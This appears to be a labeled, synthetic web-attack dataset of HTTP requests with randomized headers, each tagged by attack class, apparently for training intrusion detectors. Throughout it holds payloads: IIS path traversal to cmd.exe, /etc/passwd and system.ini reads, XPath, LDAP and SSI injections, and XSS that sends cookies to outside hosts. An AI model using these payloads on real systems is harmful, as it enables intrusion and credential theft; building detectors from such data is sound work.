If-Unmodified-Since: Fri, 13 Jan 06 03:44:40 CET
If-Range: Tue, 11 Sep 07 12:11:09 UTC
Max-Forwards: 068
Range: 55330-08,72-9
Referer: http://www.u4acl.it/rlaetrhy/gcocAeh/yaegx.html
User-Agent: ethisv/9.8
UA-Color: color16
Via: FTP/9.7 132.55.5.160, HTTP/3.5 www.mj4tep.jpeg, 0.3 www.ikiett.htm
Upgrade: ocfh3/0.8, wds/5.3, eda/9.0, eSS/4.4, ikt/4.1
----: ----------------------------------------

MGDLe=>1tzthItf&lfrmnynttt=icArw15&hii=/etc/passwd

End - Id: 46122
Start - Id: 43830
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 194.67.122.205
Connection: keep-alive
Accept: image/*;q=0.1, video/*;q=0.5, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 172.122.152.72
Cookie: 9a3epnq=63;d5etxlt=c)nE4passthruiframemhat1apDoaEA;eehtw1psatkoaui=22165;yih0un=0045697
Cookie2: $Version="567"
Date: Wed, 27 Oct 04 20:05:32 GMT
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 15 Jan 07 03:10:45 CET
If-Match: "j@5YzCedrakc5Y9"
If-None-Match: "_Drnio4cZYcVGfkG@p69"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM bXllcm5qdDV1U2VkYXBkd2lwbXRlaGloYWFzNWR1bnQzag==
Range: -694,-90120,-768
Referer: http://uoteo.be/aoiA/3wte/sied/Os2min.wmn
TE: trailers,trailers
Trailer: Accept
User-Agent: tbhtPnnsdPfipikvh
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 396755923911
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43830
Start - Id: 50038
class: XPathInjection
PUT /ag4snvpsloti7eyea4/lTuA.jpeg? HTTP/1.1
Content-Length: 183
Content-Language: gdqe,oo
Content-Encoding: gzip
Content-Location: http://www.edasai.biz/ra7iinei/0ll0s6t.sh
Content-MD5: bnR0dWF1M2d1aXRsbW9UZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jan 07 21:44:28 CET
Last-Modified: Thu, 03 Apr 08 21:14:56 GMT
Host: www.nnwfsaTiG.com
Connection: close
Accept: audio/x-wav, text/xml;q=0.3
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 36a07se']  |   P |  //user[     name/text(   )  =   'eee1r
Accept-Language: p1seity'    or  count(path/child::node()[position( )=((   i + j    +    k   +   l    +1)]    |    path/child::*()[position()=(k+1)])=1   or     'm85mle' =  '     aiifz4'    or
Cache-Control: min-fresh=00317
Date: Tue, 12 Aug 08 11:09:28 CET
Expect: 100-continue
If-Unmodified-Since: Sat, 08 Apr 06 23:51:22 GMT
If-None-Match: "pX8p4WY8Fy8gf1M-nSFX"
If-Range: Tue, 17 Jul 07 05:50:43 UTC
Max-Forwards: 251
MIME-Version: 4.2
Pragma: imytsHm=zgfEaSem
Proxy-Authorization: Digest realm
Authorization: NTLM YmRuZWVhZWVyd3kydHNhb2NmS01oZW95MmRJbGxrc2lpdDFv
Referer: http://wrrc3Ft5.it/unye.mpg
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 0.4; th-th; rv:1.0.4) Gecko/22939738
UA-CPU: MIPS
Via: 3.7 49.40.173.193, FTP/6.6 www.ptjuo.jpg, HTTP/8.0 www.q9prmr.js
Warning: 506 www.yot0sp.css:0 "13chsryancyt" "Sat, 14 Aug 04 10:36:35 CET"
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sickisistnZM=922&aVL37KG4C=yw&VBVhAsgm=hoy<mailbg&elos&hojaLntygFree=aasqCruoowrafshw&eCk5a8djds=03662759&srehbntT=9fa&slgzhshlks=lhEs:bes&oPteiSsMicetol=aslseytoJoisdjns&zru=ni

End - Id: 50038
Start - Id: 47675
class: XSS
GET /ag.57c@2xh.jFuYM.bin?04hNsn=eDLqawQXtB4_&me=a1luUzWLf&Elefitses9oEtt=nitnheqxriwRee&too7CvpzhRn=j%7Cz7St+%407&8itbda=elinkibinv&ispaIoe=826&h@_8H=mds&ieD9o5DrIVa1=%3Cobject+++classid++%3D+++%22+++++clsid%3A...+%22+++++codebase++%3D+%22++++javascript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Ftiistrniel.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&lreplacewRx=o._5OxXw%40Z&Ees=iylebdenoN5p1a1r&oueeholl=9k4h HTTP/1.0
Host: www.TCar.uk
Connection: close
Accept: video/quicktime;q=0.5, text/html, image/*;q=0.5
Accept-Charset: cp-950;q=0.7, us-ascii, gb2312, us-ascii
Accept-Encoding: *;q=0.8
Accept-Language: uSb-ras, nUTere-gboaiO;q=0.9
Cache-Control: no-transform
Client-ip: 66.135.63.45
Cookie: doiaCn9adloi=781977234;l9fltp=93961;O57v=Rusy
Cookie2: $Version="699"
Date: Sun, 24 Aug 08 08:53:24 CET
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 04 Jan 07 14:27:36 CET
If-Unmodified-Since: Wed, 28 Jan 09 03:46:14 CET
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: "50LT_@D2X3C0W8wFRuvs"
If-Range: *
Max-Forwards: 727
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: http://www.Nastv.biz/dcesie/oEop1p6/aGk5iE.php
TE: chunked
Trailer: From
User-Agent: Mozilla/2.4 (compatible; MSIE 1.1; Win98; ltwvystie; E3hhsAibd; ho8nad)
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: deflate
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47675
Start - Id: 47184
class: XSS
GET /eJTaT0wski/tCuZkmAP-Fjc.YoPqwV/JV/eI4ZxW7BJa/aorhrlbntat/YYV6NP2WiuM/tRp5MHKUE.cgi?ilatb0NatTttdan=%3Clink+++++rel++%3D+%22++++stylesheet+++++%22+href++++%3D%22javascript%3A++++%5Balert%28%27ibRc3r%27%29%3B%5D++%22++++%3E&ri=71&aisr1D9uasf4=s HTTP/1.1
Host: www.yrnli.de
Connection: wmart
Accept: */*
Accept-Charset: x-mac-hebrew, euc-jp, windows-1253;q=0.5, utf-7;q=0.6, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=7
Client-ip: 65.151.77.8
Cookie: utIg6xRXgvH=bbE;IsL50aoodhioe2c=aq
Cookie2: $Version="93"
Date: Sun, 06 Jan 08 06:35:35 UTC
ETag: W/"sx302XohAygbTfJiaE"
Expect: 100-continue
From: fpss@iohe.it
If-Modified-Since: Mon, 22 Nov 04 10:30:00 GMT
If-Unmodified-Since: Sat, 09 Dec 06 11:53:44 CET
If-Match: "KpN0d.NNBWyf3Np.O"
If-None-Match: "OaO7O@WsxR_JcltmE6lZ"
If-Range: Sat, 02 Dec 06 01:40:03 UTC
Max-Forwards: 346
MIME-Version: 1.6
Pragma: uva='di'
Proxy-Authorization: NTLM ckhVbThFczZLOW9pcWFjb2FkaWNlbHVDdzJpVWJya3BoZWUz
Authorization: Basic b0FuTTJubjpoaGZlbWdT
Range: 671-463
Referer: /7jHyE/af7rb1e/adlyD/guoo/tcrTueU.php
TE: deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: tjefisEbntodlesvrrz5
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 739x565
Via: HTTP/1.5 www.ersai0tP.htm
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47184
Start - Id: 36204
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.teb5.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Encoding: *
Accept-Language: *
Cookie2: $Version="3"
Date: Thu, 24 Jul 08 14:00:41 UTC
Expect: 100-continue
If-Modified-Since: Fri, 11 Aug 06 09:22:23 CET
Max-Forwards: 691
Pragma: eehlUt6=3
Referer: /eital/iaolfe/aimmyhe.conf
Trailer: Date
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 9.5; zR-ne; rv:5.0.3) Gecko/03371920
Via: 1.7 www.sqetltr.jpg, 5.3 www.borc.jpg:33

null

End - Id: 36204
Start - Id: 39085
class: LdapInjection
PUT /osmremr/27m218jRNePTA/ttUyy/mamdyajteazh/xiI/rja11t/Ku7l.9YbAV74/scriptSnph-UZ4GYvGZpJ1.gif? HTTP/1.0
Content-Length: 162
Content-Language: dnU,midj9ty
Content-Encoding: gzip
Content-Location: /yccani/eflhnn/s9lrb/dgEm/nfegte.zip
Content-MD5: T3Nld25ld29pYWxBbk5hUg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Nov 07 02:12:36 UTC
Last-Modified: Tue, 03 Apr 07 13:36:13 UTC
Host: 107.3.41.196
Connection: 6oittne
Accept: video/*
Accept-Charset: gb2312, windows-1252;q=0.8, iso-8859-6;q=0.9, isiri-3342;q=0.8, x-mac-hebrew
Accept-Encoding: 
Accept-Language: dss-iwtiDc;q=0.0, iFmrgl-tj;q=0.3, uoss6-3c9a, qmth6t-Winw;q=0.2
Cache-Control: no-store
Client-ip: 204.162.74.155
Cookie: PaWhVZpx=765543172;rf_winntcmP8=0qe)(    |    (dh=*);AHCmetanph-6=6iEIlikeipasswdu
Cookie2: $Version="00"
Date: Mon, 21 Apr 08 14:36:50 UTC
ETag: "uJ_x_Z2sbrGT@LC"
Expect: 100-continue
If-Modified-Since: Fri, 18 Nov 05 11:05:24 UTC
If-Unmodified-Since: Sat, 26 Feb 05 04:13:05 GMT
If-Match: *
If-None-Match: "4PvMV1gX2dmi0ftZZ"
If-Range: *
Max-Forwards: 76
MIME-Version: 1.0
Pragma: no-cache
Authorization: Basic YTR0dTVoOWU6dm50dHNy
Range: 5646-401977,1107-6680,-60
Referer: http://www.eBhodc.cz/lmid/Tooed6/h7xSdi/i0MmT.wmn
TE: chunked;q=0.9
Trailer: Expect
User-Agent: i5id9h
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Pixels: 455x2330
Via: HTTP/5.5 www.lcgGc5.jpeg, HTTP/6.3 www.ec0t.tiff
Transfer-Encoding: compress
Upgrade: edi/7.2, ZlfvNb/1.0, ftu/7.0, 4rk/5.5, nltsd/4.8
Warning: 684 www.12ndoh.gif "dmNngea" 
X-Forwarded-For: 138.193.124.167
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BaOr.=75&tysosmErpnmfPa7=@t&sIGDmSLUQP6W=mThztnaottie2&ruoeioaiwpziTsa=frnrwinnt0mdo6ttM&Q6rK8A_=ssdMxel&.ai7PTTbin0PL=E&pQvdJQ12mCB=8&9D4y5s=he5accepth&S7P=eCe

End - Id: 39085
Start - Id: 49744
class: XPathInjection
GET /v5SCMzb0/WmcdHKfRBUe/w8M6h-KBF/euChrW9d499Qgu2gqc/d5-12/usk34fre/eyehaxAwleyflo/jip/nHxBkYecWL@e-mNr.html?P6Gl-CIH1ybetween=444Vqlpi&eua5gCednio=oMarfxieooysog&nheisenacso1=dw24Aumtwgette&ioOrysameOdt=gri&Nno=030268781&mNhxenhuHogagd=ty&nurlm7ci=asbsetuota&5uIN=4598547&i2mwEa6q1=ioqa%27+++++or++%28i++++%3C+count%28se%2Fchild%3A%3Atext%28%29%29+++and+++j++++%3C++count%288c%2Fchild%3A%3Acomment%28%29%29+++++and+k+%3C++++count%28yretmh%2Fchild%3A%3A*%29++++%29+or+++%27th%27++++%3D+%27++0ee%27+++++or&ecr3raHhwdgnaF=hhamuSyTf HTTP/1.0
Host: 93.140.114.197:80
Connection: fy2fo
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: hiK-rnmo, e-hftrn;q=0.3, jne-D96t
Cache-Control: rehsL=mtrqKpbo
Client-ip: 24.134.122.55
Cookie: jPuu=v0o$s|ciy t;fom=hAncr;jbeR4ttAan=45977217
Cookie2: $Version="05"
Date: Thu, 02 Mar 06 01:24:01 GMT
ETag: "sMfN7FOz1rBZfHdD2"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Tue, 14 Dec 04 18:24:54 GMT
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: "fkxUqCNikiz4VpiCvm"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 76
MIME-Version: 0.1
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: /cuder/orlns.pdf
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/5.9 (Machintosh; U; PPC Mac OS X 4.3; Te-eh; rv:0.7.3) Gecko/34181542
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4005x8626
Via: rlhoG/4.3 www.roetf.tiff, FTP/9.4 169.16.95.11
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49744
Start - Id: 38718
class: LdapInjection
GET /MZAO1qZl5UBIf.mdb?eqJhavHTO=91662829&hdDh9acIereh=7272820&s2itkehut=4&tcehssnaimaiqD=yim7&q5s=t.4fXP0&tauiilsa=dstpjjiniReHeetnrh&ri37Mdyahss=57&MeXyUwpasswd_odiv8=66182&qi6ojqelpl4=2920703&eojnwaeE=2&uhrcrnasiaiuTep=rzbcrpQr&6c9e=syebp&pmei=duos2ucmetb0npdqrt&iew4n=6y%29%28%26%28objectClass%3D+++pne*%29 HTTP/1.1
Host: 31.115.213.50:80
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.3
Accept-Encoding: deflate;q=0.6, gzip;q=0.3, compress
Accept-Language: det-s;q=0.3
Cache-Control: no-store
Client-ip: 95.161.31.177
Cookie: aeD6imsslB=4723568366;mad5mi=ttXTB;Nr4AObautoexecg=oa8SFhhNp@I;uealumg7asms=05;iciieuBt6mt=0685441
Cookie2: $Version="8"
Date: Sat, 24 Mar 07 06:13:32 CET
ETag: W/"NFQTVepJm2oQTAnAc-"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Thu, 18 Feb 10 18:29:19 UTC
If-Unmodified-Since: Wed, 03 Dec 08 24:27:46 UTC
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.7
Pragma: 8teer3pr='nhI'
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: NTLM eWd1c3NpQWR5ZWh1a3RuOG1ldDRzb2dhbGhpZWJhOXR0Y2FzOEF1dG5jaA==
Range: 5873-
Referer: http://gdaenrpf.it/hsqslesa/amuGah/eniesujt.php4
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.9 (X11; U; Unix 9.5; Ep-qa; rv:8.6.7) Gecko/98695105
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: 5.3 www.7hmn2ez.gif, k8n/7.9 55.26.134.88:240
Transfer-Encoding: gzip
Upgrade: uau3/2.9
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 0697506678006
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38718
Start - Id: 46786
class: XSS
POST /tnermddb/ti/sMBZ@yatSK519/tetei0cpkhpua1d/ehGlrFZ/7jSugV/iN4G2WBJK55/twmwt2ttncyTmie/o@qm8U98tsML.js? HTTP/1.0
Content-Length: 274
Content-Language: tlp,eh,fhrSc
Content-Encoding: identity
Content-Location: http://hres3iAI.org/miIosoe/rnee/ecee/ihte/ea2nrf.swf
Content-MD5: blI4YWU3ZXNBc2V1dWxrbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Apr 06 20:41:04 CET
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: 138.122.58.150:80
Connection: s2J0Ei
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 251.85.125.254
Cookie: llincen=likeoa5z;tTedonPco=hinlhiqb4eeydg;eac=xttLteti;28selu9AttcLjt=142767511
Cookie2: $Version="91"
Date: Sun, 06 Jul 08 16:56:57 CET
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Mon, 11 Feb 08 09:49:34 CET
If-Unmodified-Since: Sat, 01 Apr 06 01:25:31 CET
If-Match: *
If-None-Match: *
If-Range: "6.sj3CoTIQHO6N_OnR"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 833-
Referer: /cefe9psi/oreEo.fgf
TE: trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/4.2 (compatible; etnMo; Solaris; nd1Xtt)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ewene=<xml     id=   "     X"  ><a><b  >&lt;script  >[window.open('http://19.102.131.49/to.sh'+document.cookie);]&lt;/script   >;</b   ></a ></xml   >&ereOTeegi=320&tsmspoEiw16tse=433347&5ey=4923925

End - Id: 46786
Start - Id: 40685
class: SSI
GET /wdfZWMXc@7pxuEr/sdetpeErmsq8/rygigruo/nlY@AX2q8K5c.cfm?YUhttpsP=5m&g9e0cosirs=3Oox%27&amJ27E8QhO=+lat&Vdz-Fk9=%3C%21--+%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&twrcTddadBuem1=tieeueooyae&c6SM7gr6=axtit6%26le%5C9&uhPd4trncakytod=aBZBlb6k2&crpmneps0=sibaw+e+&mudsxh5=013&6siaebrhI=esehservices8es+agsshs8r+ HTTP/1.0
Host: 199.0.163.55:3893
Connection: nhiev
Accept: */*;q=0.8
Accept-Charset: gb2312;q=0.0
Accept-Encoding: gzip, deflate;q=0.1, identity, identity;q=0.3
Accept-Language: T8c-iwU, sie-uyd8s;q=0.0, 3Ze-tEn1osq, 4SnVe-essipR;q=0.2, yjb-ivdac
Cache-Control: apeEe2e='saJajm'
Cookie: toRhte=i3dhBDP.8hF;rTcqlfBxhqF=yicddn;w9cbgsoundgr==iref7oe;ec=2wn\;ee=b>Ioe/f
Date: Fri, 25 Jan 08 03:50:22 UTC
ETag: "GptlDo7NDuQtbKkqIsI"
If-Modified-Since: Thu, 17 Jun 04 19:34:27 GMT
If-Unmodified-Since: Wed, 09 Feb 05 13:42:50 GMT
If-Match: "6S9@bNQf9-fgd_rmx7S"
If-None-Match: "HY4LNrto3Ph5t0PV57o0"
Max-Forwards: 8
MIME-Version: 0.6
Pragma: ifekta='x'
Referer: /hsaee9R/editt/yntoar/nlht/mrnmA.bin
Trailer: Date
User-Agent: EIui1Ot2ad/5.0
Via: FTP/9.0 164.4.105.68:320, FTP/5.5 127.13.253.132:53
Transfer-Encoding: 6Neyv
Upgrade: jre/3.8, na6R91/0.3
X-Forwarded-For: 31.11.7.35
X-Serial-Number: 322812284

null

End - Id: 40685
Start - Id: 44015
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.Ceeax.ch
Connection: tasrbtv
Accept: application/rtf;q=0.7, video/mpeg, text/html
Accept-Charset: x-mac-ce;q=0.1, iso-8859-4, isiri-3342;q=0.6, iso-8859-8-i, x-mac-roman;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 78.141.142.69
Cookie: fdigshrpRUt=|oeno2erxssrtid
Cookie2: $Version="287"
Date: Thu, 03 Jul 08 22:26:36 GMT
ETag: W/"onnOX1HUYGEaA@7"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 30 Dec 08 21:49:23 UTC
If-Unmodified-Since: Sat, 29 Nov 08 01:35:55 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: *
If-Range: Fri, 29 Aug 08 20:10:51 UTC
Max-Forwards: 16
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: /IdDut/yallAsn/tnsu0Ewd/dnue/ci6cx.pl
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: lsistlsmtehjvuiiswdi
UA-CPU: PowerPC
UA-Disp: 8658,2452,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: linaj; ynoa=aeIfci
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44015
Start - Id: 38140
class: LdapInjection
GET /9pqsaNnptovoos75meal/qihiimk7h/fsobuenziaosxebynke/QpqI/8Hy40-wn/Aq-lexecVl/gwnaobusedA/4oqkoMfithahr5oEaE.sh?HRar=203%29%28%26%28objectClass%3Dhbd%29%28%7C%28sn++++%3D5o%29%28cn%3DaNht++J*%29%29&MADFUU=152144&IJMjsZeval6CWL=cLa23csefl%24roes&JY@fKo-BNJ=0545&samtert=Eorsaieha5orr6ocmn&wibtGrp=Nsbeoi4lto+ HTTP/1.1
Host: www.3h5artHOly.fr:80
Connection: tnAmdr
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate;q=0.7, compress;q=0.5
Accept-Language: eatzora-slxswo, hmixtzt-hato1rei, kuzzh-sm;q=0.5
Cache-Control: s='em1'
Client-ip: 91.30.161.167
Cookie: iabaaag=aaew;2le=9500322088;.b90z1jA=6l7passwdeb;5ttanfeEhtaet87=66440;Goza=2
Cookie2: $Version="23"
Date: Sat, 19 Apr 08 11:07:33 CET
ETag: W/"98fpe.RdDv1e0Ihe"
Expect: 8ph3Hea
From: yoralt7@issci.gov
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "Gfx47jftAuUdJGxeZq"
If-None-Match: "-.M-32mUStBWjNK62A"
If-Range: Thu, 07 Dec 06 19:43:08 UTC
Max-Forwards: 71
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: 79as to0Ea=4osntpn
Range: -49,90-,6-
Referer: http://www.htdrIA.fr/edaio.php3
TE: deflate;q=0.6,chunked,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 6.0; so-c2; rv:1.0.7) Gecko/50570263
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 505x614
Via: 1.3 61.93.227.249, HTTP/7.4 21.30.44.44
Transfer-Encoding: clau2c
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38140
Start - Id: 48074
class: XSS
GET /ll@ci.E3M0B/KsformVo9D/nS.46v/dloCbNraHssd/eMGrOXUGxltBDl/e4ONR3F@VN1aPjPoT/tb56a9/.MLHZ.jpg?xnfoeCq9rl0no9=%3Cmeta+++http-equiv%3D++++%22+refresh++++%22++++content+%3D%22+++++0%3Burl%3Djavascript%3A+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.atnt.com%2Fcgi-bin%2Fnichtondet.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.1
Host: 180.102.115.180:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 151.8.225.81
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Wed, 11 May 05 04:02:02 GMT
ETag: "U9-YQ6G4Lm_.cAH"
Expect: ongmeo9
From: aetdmr@igroised.de
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Tue, 11 Aug 09 19:22:21 UTC
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: Mon, 10 May 04 22:34:19 GMT
Max-Forwards: 016
MIME-Version: 5.2
Pragma: SAa=f
Proxy-Authorization: Digest nonce
Authorization: NTLM ZmVodnNoc29lcmVlY290ZW9haDRhbnVyZ2Y4Tm9pbGVlc3VkVHVkdGZ1
Range: -1,041-88,-53
Referer: http://hrfef5h.it/agxiaot5/hy1ez/eouy.css
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: mexte/3.2.5
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 19g/1.8 www.ssheta.shtml, 5.5 27.199.70.159
Transfer-Encoding: gzip
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 952 www.numR.js "HIeoi8e9" "Mon, 10 Sep 07 19:58:55 UTC"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48074
Start - Id: 40898
class: SSI
GET /gnieaoh/r@phS/7n/wcQnyKpK/tbecebRtUzEWeiGate/@hNL8Lwinntd/o3bkpperl8/amWmOoJR34/hRlY0.jpg?Apteerssucsde=%3C%21--+%23odbc+++connect%3D%22taemd%2CCS1n%2Cue2cn%22++++++++statement%3D%22select+++++*++from+++obmn%22--%3E HTTP/1.1
Host: www.Texlcriwt.cz:870
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.5, gzip;q=0.7, compress
Accept-Language: bmlp-eeil, 8eau-mewabe;q=0.7, v-irrdeil;q=0.3, ssui-iewusnid
Cache-Control: t=Edac
Client-ip: 215.13.110.135
Cookie: telbrmyhlu6=i5snwnTporee;lv=5;Eietdakd7n=a6Abp-waAhttp;hHoit=0520411835;Rcastteet=nis52h]0r8agld
Cookie2: $Version="350"
Date: Wed, 18 Apr 07 16:43:09 CET
ETag: "GRCzclJasRqBalTu"
Expect: 100-continue
From: ditrnsd@mzoyfsuain.uk
